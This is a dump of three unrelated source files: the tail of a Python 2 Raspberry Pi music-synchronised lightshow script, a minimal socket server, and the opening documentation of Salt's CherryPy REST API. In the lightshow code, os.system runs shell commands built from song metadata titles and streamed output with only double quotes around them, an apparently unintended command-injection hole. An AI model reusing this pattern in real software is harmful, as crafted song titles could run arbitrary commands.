hc = hardware_controller.Hardware()
# get copy of configuration manager
cm = hc.cm
parser.set_defaults(playlist=cm.lightshow.playlist_path)
args = parser.parse_args()
class Lightshow(object):
def __init__(self):
self.stream = None
self.fm_process = None
self.streaming = None
self.sample_rate = None
self.num_channels = None
self.music_file = None
self.fft_calc = None
self.light_delay = None
self.cache_found = None
self.cache_matrix = None
self.cache_filename = None
self.config_filename = None
self.song_filename = None
self.terminal = None
self.output = lambda raw_data: None
self.mean = np.array([12.0 for _ in range(cm.hardware.gpio_len)], dtype='float32')
self.std = np.array([1.5 for _ in range(cm.hardware.gpio_len)], dtype='float32')
self.attenuate_pct = cm.lightshow.attenuate_pct
self.sd_low = cm.lightshow.SD_low
self.sd_high = cm.lightshow.SD_high
self.decay_factor = cm.lightshow.decay_factor
self.decay = np.zeros(cm.hardware.gpio_len, dtype='float32')
self.physical_gpio_len = cm.hardware.physical_gpio_len
self.network = hc.network
self.server = self.network.networking == 'server'
self.client = self.network.networking == "client"
if cm.lightshow.use_fifo:
if os.path.exists(cm.lightshow.fifo):
os.remove(cm.lightshow.fifo)
os.mkfifo(cm.lightshow.fifo, 0777)
self.chunk_size = cm.audio_processing.chunk_size # Use a multiple of 8
atexit.register(self.exit_function)
# Remove traceback on Ctrl-C
signal.signal(signal.SIGINT, lambda x, y: sys.exit(0))
signal.signal(signal.SIGTERM, lambda x, y: sys.exit(0))
if cm.terminal.enabled:
self.terminal = bright_curses.BrightCurses(cm.terminal)
curses.wrapper(self.launch_curses)
def exit_function(self):
"""atexit function"""
if self.server:
self.network.set_playing()
self.network.broadcast([0. for _ in range(cm.hardware.gpio_len)])
time.sleep(1)
self.network.unset_playing()
hc.clean_up()
if cm.fm.enabled:
self.fm_process.kill()
if self.network.network_stream:
self.network.close_connection()
if cm.lightshow.mode == 'stream-in':
try:
self.streaming.stdin.write("q")
except IOError:
pass
os.kill(self.streaming.pid, signal.SIGINT)
if cm.lightshow.use_fifo:
os.unlink(cm.lightshow.fifo)
def update_lights(self, matrix):
"""Update the state of all the lights
Update the state of all the lights based upon the current
frequency response matrix
:param matrix: row of data from cache matrix
:type matrix: list
"""
brightness = matrix - self.mean + (self.std * 0.5)
brightness = (brightness / (self.std * (self.sd_low + self.sd_high))) \
* (1.0 - (self.attenuate_pct / 100.0))
# insure that the brightness levels are in the correct range
brightness = clip(brightness, 0.0, 1.0)
# brightness = round(brightness, decimals=3)
brightness = nan_to_num(brightness)
# calculate light decay rate if used
if self.decay_factor > 0:
self.decay = where(self.decay <= brightness,
brightness,
self.decay)
brightness = where(self.decay <= brightness,
brightness,
self.decay)
self.decay = where(self.decay - self.decay_factor > 0,
self.decay - self.decay_factor,
0)
# broadcast to clients if in server mode
if self.server:
self.network.broadcast(brightness)
if self.terminal:
self.terminal.curses_render(brightness)
return
# in the instance a single channel is defined convert scalar back into array
if not hasattr(brightness, "__len__"):
brightness = np.array([brightness])
for pin in range(len(brightness[:self.physical_gpio_len])):
hc.set_light(pin, True, brightness[pin])
if hc.led:
if cm.led.led_channel_configuration == "EXTEND":
leds = brightness[self.physical_gpio_len:]
else:
leds = brightness[:cm.hardware.gpio_len]
for led_instance in hc.led:
led_instance.write_all(leds)
def set_fm(self):
pi_version = Platform.pi_version()
srate = str(int(self.sample_rate / (1 if self.num_channels > 1 else 2)))
fm_command = ["sudo",
cm.home_dir + "/bin/pifm",
"-",
cm.fm.frequency,
srate,
"stereo" if self.num_channels > 1 else "mono"]
if pi_version >= 2:
fm_command = ["sudo",
cm.home_dir + "/bin/pi_fm_rds",
"-audio", "-", "-freq",
cm.fm.frequency,
"-srate",
srate,
"-nochan",
"2" if self.num_channels > 1 else "1"]
log.info("Sending output as fm transmission")
with open(os.devnull, "w") as dev_null:
self.fm_process = subprocess.Popen(fm_command,
stdin=subprocess.PIPE,
stdout=dev_null)
self.output = lambda raw_data: self.fm_process.stdin.write(raw_data)
def set_audio_device(self):
if cm.fm.enabled:
self.set_fm()
elif cm.lightshow.audio_out_card is not '':
if cm.lightshow.mode == 'stream-in':
self.num_channels = 2
output_device = aa.PCM(aa.PCM_PLAYBACK, aa.PCM_NORMAL, cm.lightshow.audio_out_card)
output_device.setchannels(self.num_channels)
output_device.setrate(self.sample_rate)
output_device.setformat(aa.PCM_FORMAT_S16_LE)
output_device.setperiodsize(self.chunk_size)
self.output = lambda raw_data: output_device.write(raw_data)
def set_audio_source(self):
stream_reader = None
outq = None
if cm.lightshow.mode == 'audio-in':
# Open the input stream from default input device
self.streaming = aa.PCM(aa.PCM_CAPTURE, aa.PCM_NORMAL, cm.lightshow.audio_in_card)
self.streaming.setchannels(self.num_channels)
self.streaming.setformat(aa.PCM_FORMAT_S16_LE) # Expose in config if needed
self.streaming.setrate(self.sample_rate)
self.streaming.setperiodsize(self.chunk_size)
stream_reader = lambda: self.streaming.read()[-1]
elif cm.lightshow.mode == 'stream-in':
outq = Queue()
if cm.lightshow.use_fifo:
self.streaming = subprocess.Popen(cm.lightshow.stream_command_string,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
preexec_fn=os.setsid)
io = os.open(cm.lightshow.fifo, os.O_RDONLY | os.O_NONBLOCK)
stream_reader = lambda: os.read(io, self.chunk_size)
outthr = Thread(target=self.enqueue_output, args=(self.streaming.stdout, outq))
else:
# Open the input stream from command string
self.streaming = subprocess.Popen(cm.lightshow.stream_command_string,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stream_reader = lambda: self.streaming.stdout.read(self.chunk_size)
outthr = Thread(target=self.enqueue_output, args=(self.streaming.stderr, outq))
outthr.daemon = True
outthr.start()
return stream_reader,outq
def audio_in(self):
"""Control the lightshow from audio coming in from a real time audio"""
self.sample_rate = cm.lightshow.input_sample_rate
self.num_channels = cm.lightshow.input_channels
stream_reader,outq = self.set_audio_source()
log.debug("Running in %s mode - will run until Ctrl+C is pressed" % cm.lightshow.mode)
print "Running in %s mode, use Ctrl+C to stop" % cm.lightshow.mode
# setup light_delay.
chunks_per_sec = ((16 * self.num_channels * self.sample_rate) / 8) / self.chunk_size
light_delay = int(cm.lightshow.light_delay * chunks_per_sec)
matrix_buffer = deque([], 1000)
self.set_audio_device()
# Start with these as our initial guesses - will calculate a rolling mean / std
# as we get input data.
# preload running_stats to avoid errors, and give us a show that looks
# good right from the start
count = 2
running_stats = RunningStats.Stats(cm.hardware.gpio_len)
running_stats.preload(self.mean, self.std, count)
hc.initialize()
fft_calc = fft.FFT(self.chunk_size,
self.sample_rate,
cm.hardware.gpio_len,
cm.audio_processing.min_frequency,
cm.audio_processing.max_frequency,
cm.audio_processing.custom_channel_mapping,
cm.audio_processing.custom_channel_frequencies,
1)
if self.server:
self.network.set_playing()
songcount = 0
# Listen on the audio input device until CTRL-C is pressed
while True:
if cm.lightshow.mode == 'stream-in':
try:
streamout = outq.get_nowait().strip('\n\r')
except Empty:
pass
else:
print streamout
if cm.lightshow.stream_song_delim in streamout:
songcount+=1
if cm.lightshow.songname_command:
streamout = streamout.replace('\033[2K','')
streamout = streamout.replace(cm.lightshow.stream_song_delim,'')
streamout = streamout.replace('"','')
os.system(cm.lightshow.songname_command + ' "Now Playing ' + streamout + '"')
if cm.lightshow.stream_song_exit_count > 0 and songcount > cm.lightshow.stream_song_exit_count:
break
try:
data = stream_reader()
except OSError as err:
if err.errno == errno.EAGAIN or err.errno == errno.EWOULDBLOCK:
continue
try:
self.output(data)
except aa.ALSAAudioError:
continue
if len(data):
# if the maximum of the absolute value of all samples in
# data is below a threshold we will disregard it
audio_max = audioop.max(data, 2)
if audio_max < 250:
# we will fill the matrix with zeros and turn the lights off
matrix = np.zeros(cm.hardware.gpio_len, dtype="float32")
log.debug("below threshold: '" + str(audio_max) + "', turning the lights off")
else:
matrix = fft_calc.calculate_levels(data)
running_stats.push(matrix)
self.mean = running_stats.mean()
self.std = running_stats.std()
matrix_buffer.appendleft(matrix)
if len(matrix_buffer) > light_delay:
matrix = matrix_buffer[light_delay]
self.update_lights(matrix)
def load_custom_config(self):
"""
Load custom configuration settings for file config_filename
"""
"""
example usage
your song
carol-of-the-bells.mp3
First run your playlist (or single files) to create your sync files. This will
create a file in the same directory as your music file.
.carol-of-the-bells.mp3.cfg
DO NOT EDIT THE existing section [fft], it will cause your sync files to be ignored.
If you want to use an override you need to add the appropriate section
The add the options you wish to use, but do not add an option you do not
want to use, as this will set that option to None and could crash your lightshow.
Look at defaults.cfg for exact usages of each option
[custom_lightshow]
always_on_channels =
always_off_channels =
invert_channels =
preshow_configuration =
preshow_script =
postshow_configuration =
postshow_script =
[custom_audio_processing]
min_frequency =
max_frequency =
custom_channel_mapping =
custom_channel_frequencies =
Note: DO NOT EDIT THE existing section [fft]
Note: If you use any of the options in "custom_audio_processing" your sync files will be
automatically regenerated after every change. This is normal as your sync file needs
to match these new settings. After they have been regenerated you will see that they
now match the settings [fft], and you will not have to regenerate then again. Unless
you make more changes again.
Note: Changes made in "custom_lightshow" do not affect the sync files, so you will not need
to regenerate them after making changes.
"""
if os.path.isfile(self.config_filename):
config = ConfigParser.RawConfigParser(allow_no_value=True)
with open(self.config_filename) as f:
config.readfp(f)
if config.has_section('custom_lightshow'):
lsc = "custom_lightshow"
always_on = "always_on_channels"
if config.has_option(lsc, always_on):
hc.always_on_channels = map(int, config.get(lsc, always_on).split(","))
always_off = "always_off_channels"
if config.has_option(lsc, always_off):
hc.always_off_channels = map(int, config.get(lsc, always_off).split(","))
inverted = "invert_channels"
if config.has_option(lsc, inverted):
hc.inverted_channels = map(int, config.get(lsc, inverted).split(","))
# setup up custom preshow
has_preshow_configuration = config.has_option(lsc, 'preshow_configuration')
has_preshow_script = config.has_option(lsc, 'preshow_script')
if has_preshow_configuration or has_preshow_script:
preshow = None
try:
preshow_configuration = config.get(lsc, 'preshow_configuration')
except ConfigParser.NoOptionError:
preshow_configuration = None
try:
preshow_script = config.get(lsc, 'preshow_script')
except ConfigParser.NoOptionError:
preshow_script = None
if preshow_configuration and not preshow_script:
try:
preshow = json.loads(preshow_configuration)
except (ValueError, TypeError) as error:
msg = "Preshow_configuration not defined or not in JSON format."
log.error(msg + str(error))
else:
if os.path.isfile(preshow_script):
preshow = preshow_script
cm.lightshow.preshow = preshow
# setup postshow
has_postshow_configuration = config.has_option(lsc, 'postshow_configuration')
has_postshow_script = config.has_option(lsc, 'postshow_script')
if has_postshow_configuration or has_postshow_script:
postshow = None
postshow_configuration = config.get(lsc, 'postshow_configuration')
postshow_script = config.get(lsc, 'postshow_script')
if postshow_configuration and not postshow_script:
try:
postshow = json.loads(postshow_configuration)
except (ValueError, TypeError) as error:
msg = "Postshow_configuration not defined or not in JSON format."
log.error(msg + str(error))
else:
if os.path.isfile(postshow_script):
postshow = postshow_script
cm.lightshow.postshow = postshow
if config.has_section('custom_audio_processing'):
if config.has_option('custom_audio_processing', 'min_frequency'):
cm.audio_processing.min_frequency = \
config.getfloat('custom_audio_processing', 'min_frequency')
if config.has_option('custom_audio_processing', 'max_frequency'):
cm.audio_processing.max_frequency = \
config.getfloat('custom_audio_processing', 'max_frequency')
if config.has_option('custom_audio_processing', 'custom_channel_mapping'):
temp = config.get('custom_audio_processing', 'custom_channel_mapping')
cm.audio_processing.custom_channel_mapping = \
map(int, temp.split(',')) if temp else 0
if config.has_option('custom_audio_processing', 'custom_channel_frequencies'):
temp = config.get('custom_audio_processing', 'custom_channel_frequencies')
cm.audio_processing.custom_channel_frequencies = \
map(int, temp.split(',')) if temp else 0
def setup_audio(self):
"""Setup audio file
and setup the output. device.output is a lambda that will send data to
fm process or to the specified ALSA sound card
"""
# Set up audio
force_header = False
if any([ax for ax in [".mp4", ".m4a", ".m4b"] if ax in self.song_filename]):
force_header = True
self.music_file = decoder.open(self.song_filename, force_header)
self.sample_rate = self.music_file.getframerate()
self.num_channels = self.music_file.getnchannels()
self.fft_calc = fft.FFT(self.chunk_size,
self.sample_rate,
cm.hardware.gpio_len,
cm.audio_processing.min_frequency,
cm.audio_processing.max_frequency,
cm.audio_processing.custom_channel_mapping,
cm.audio_processing.custom_channel_frequencies)
# setup output device
self.set_audio_device()
chunks_per_sec = ((16 * self.num_channels * self.sample_rate) / 8) / self.chunk_size
self.light_delay = int(cm.lightshow.light_delay * chunks_per_sec)
# Output a bit about what we're about to play to the logs
num_frames = str(self.music_file.getnframes() / self.sample_rate)
log.info("Playing: " + self.song_filename + " (" + num_frames + " sec)")
def setup_cache(self):
"""Setup the cache_matrix, std and mean
loading them from a file if it exists, otherwise create empty arrays to be filled
:raise IOError:
"""
# create empty array for the cache_matrix
self.cache_matrix = np.empty(shape=[0, cm.hardware.gpio_len])
self.cache_found = False
# The values 12 and 1.5 are good estimates for first time playing back
# (i.e. before we have the actual mean and standard deviations
# calculated for each channel).
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
if args.readcache:
# Read in cached fft
try:
# compare configuration of cache file to current configuration
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
if not self.cache_found:
# create empty array for the cache_matrix
self.cache_matrix = np.empty(shape=[0, cm.hardware.gpio_len])
raise IOError()
else:
# load cache from file using numpy loadtxt
self.cache_matrix = np.loadtxt(self.cache_filename)
# get std from matrix / located at index 0
self.std = np.array(self.cache_matrix[0])
# get mean from matrix / located at index 1
self.mean = np.array(self.cache_matrix[1])
# delete mean and std from the array
self.cache_matrix = np.delete(self.cache_matrix, 0, axis=0)
self.cache_matrix = np.delete(self.cache_matrix, 0, axis=0)
log.debug("std: " + str(self.std) + ", mean: " + str(self.mean))
except IOError:
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
msg = "Cached sync data song_filename not found: '"
log.warn(msg + self.cache_filename + "'. One will be generated.")
def save_cache(self):
"""
Save matrix, std, and mean to cache_filename for use during future playback
"""
# Compute the standard deviation and mean values for the cache
mean = np.empty(cm.hardware.gpio_len, dtype='float32')
std = np.empty(cm.hardware.gpio_len, dtype='float32')
for pin in range(0, cm.hardware.gpio_len):
std[pin] = np.std([item for item in self.cache_matrix[:, pin] if item > 0])
mean[pin] = np.mean([item for item in self.cache_matrix[:, pin] if item > 0])
# Add mean and std to the top of the cache
self.cache_matrix = np.vstack([mean, self.cache_matrix])
self.cache_matrix = np.vstack([std, self.cache_matrix])
# Save the cache using numpy savetxt
np.savetxt(self.cache_filename, self.cache_matrix)
# Save fft config
self.fft_calc.save_config()
cm_len = str(len(self.cache_matrix))
log.info("Cached sync data written to '." + self.cache_filename + "' [" + cm_len + " rows]")
log.info("Cached config data written to '." + self.fft_calc.config_filename)
def get_song(self):
"""
Determine the next file to play
:return: tuple containing 3 strings: song_filename, config_filename, cache_filename
:rtype: tuple
"""
play_now = int(cm.get_state('play_now', "0"))
song_to_play = int(cm.get_state('song_to_play', "0"))
self.song_filename = args.file
if args.playlist is not None and args.file is None:
most_votes = [None, None, []]
songs = cm.get_playlist(args.playlist)
for song in songs:
if len(song[2]) > 0:
if len(song[2]) >= len(most_votes[2]):
most_votes = song
if most_votes[0] is not None:
log.info("Most Votes: " + str(most_votes))
current_song = most_votes
# Update playlist with latest votes
for song in songs:
if current_song[0:3] == song[0:3] and len(song) == 3:
song.append("playing!")
# Update playlist file
cm.write_playlist(songs, args.playlist)
else:
# Get a "play now" requested song
if 0 < play_now <= len(songs):
current_song = songs[play_now - 1]
# Get random song
elif cm.lightshow.randomize_playlist:
current_song = songs[random.randrange(0, len(songs))]
# Play next song in the lineup
else:
if not (song_to_play <= len(songs) - 1):
song_to_play = 0
current_song = songs[song_to_play]
if (song_to_play + 1) <= len(songs) - 1:
next_song = (song_to_play + 1)
else:
next_song = 0
cm.update_state('song_to_play', str(next_song))
# Get filename to play and store the current song playing in state cfg
self.song_filename = current_song[1]
cm.update_state('current_song', str(songs.index(current_song)))
self.song_filename = self.song_filename.replace("$SYNCHRONIZED_LIGHTS_HOME", cm.home_dir)
filename = os.path.abspath(self.song_filename)
self.config_filename = \
os.path.dirname(filename) + "/." + os.path.basename(self.song_filename) + ".cfg"
self.cache_filename = \
os.path.dirname(filename) + "/." + os.path.basename(self.song_filename) + ".sync"
if cm.lightshow.songname_command:
metadata = mutagen.File(self.song_filename, easy=True)
if not metadata is None:
if "title" in metadata:
now_playing = "Now Playing " + metadata["title"][0] + " by " + metadata["artist"][0]
os.system(cm.lightshow.songname_command + " \"" + now_playing + "\"")
def play_song(self):
"""Play the next song from the play list (or --file argument)."""
# get the next song to play
self.get_song()
# load custom configuration from file
self.load_custom_config()
# Initialize Lights
self.network.set_playing()
hc.initialize()
# Handle the pre/post show
play_now = int(cm.get_state('play_now', "0"))
self.network.unset_playing()
if not play_now:
result = PrePostShow('preshow', hc).execute()
if result == PrePostShow.play_now_interrupt:
play_now = int(cm.get_state('play_now', "0"))
self.network.set_playing()
# Ensure play_now is reset before beginning playback
if play_now:
cm.update_state('play_now', "0")
play_now = 0
# setup audio file and output device
self.setup_audio()
# setup our cache_matrix, std, mean
self.setup_cache()
matrix_buffer = deque([], 1000)
# Process audio song_filename
row = 0
data = self.music_file.readframes(self.chunk_size)
if args.createcache:
total_frames = self.music_file.getnframes() / 100
counter = 0
percentage = 0
while data != '':
# Compute FFT in this chunk, and cache results
matrix = self.fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
self.cache_matrix = np.vstack([self.cache_matrix, matrix])
data = self.music_file.readframes(self.chunk_size)
if counter > total_frames:
percentage += 1
counter = 0
counter += self.chunk_size
sys.stdout.write("\rGenerating sync file for :%s %d%%" % (self.song_filename,
percentage))
sys.stdout.flush()
sys.stdout.write("\rGenerating sync file for :%s %d%%" % (self.song_filename, 100))
sys.stdout.flush()
data = ''
self.cache_found = False
play_now = False
print "\nsaving sync file"
while data != '' and not play_now:
# output data to sound device
self.output(data)
# Control lights with cached timing values if they exist
matrix = None
if self.cache_found and args.readcache:
if row < len(self.cache_matrix):
matrix = self.cache_matrix[row]
else:
log.warning("Ran out of cached FFT values, will update the cache.")
self.cache_found = False
if matrix is None:
# No cache - Compute FFT in this chunk, and cache results
matrix = self.fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
self.cache_matrix = np.vstack([self.cache_matrix, matrix])
matrix_buffer.appendleft(matrix)
if len(matrix_buffer) > self.light_delay:
matrix = matrix_buffer[self.light_delay]
self.update_lights(matrix)
# Read next chunk of data from music song_filename
data = self.music_file.readframes(self.chunk_size)
row += 1
# Load new application state in case we've been interrupted
cm.load_state()
play_now = int(cm.get_state('play_now', "0"))
if not self.cache_found and not play_now:
self.save_cache()
# Cleanup the pifm process
if cm.fm.enabled:
self.fm_process.kill()
# check for postshow
self.network.unset_playing()
if not play_now:
PrePostShow('postshow', hc).execute()
# We're done, turn it all off and clean up things ;)
hc.clean_up()
def network_client(self):
"""Network client support
If in client mode, ignore everything else and just
read data from the network and blink the lights
"""
log.info("Network client mode starting")
print "Network client mode starting..."
print "press CTRL<C> to end"
hc.initialize()
print
try:
channels = self.network.channels
channel_keys = channels.keys()
while True:
data = self.network.receive()
if isinstance(data[0], int):
pin = data[0]
if pin in channel_keys:
hc.set_light(channels[pin], True, float(data[1]))
continue
elif isinstance(data[0], np.ndarray):
brightness_levels = data[0]
else:
continue
for pin in channel_keys:
hc.set_light(channels[pin], True, brightness_levels[pin])
except KeyboardInterrupt:
log.info("CTRL<C> pressed, stopping")
print "stopping"
self.network.close_connection()
hc.clean_up()
def launch_curses(self, screen):
self.terminal.init(screen)
def enqueue_output(self, out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
if __name__ == "__main__":
lightshow = Lightshow()
# Make sure one of --playlist or --file was specified
if args.file is None and args.playlist is None:
print "One of --playlist or --file must be specified"
sys.exit()
if "-in" in cm.lightshow.mode:
lightshow.audio_in()
elif lightshow.client:
lightshow.network_client()
else:
lightshow.play_song()
|
server.py
|
import socket
import threading
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print("[NEW CONECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9, 2017.7.3, Oxygen
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: Oxygen
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentcation is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
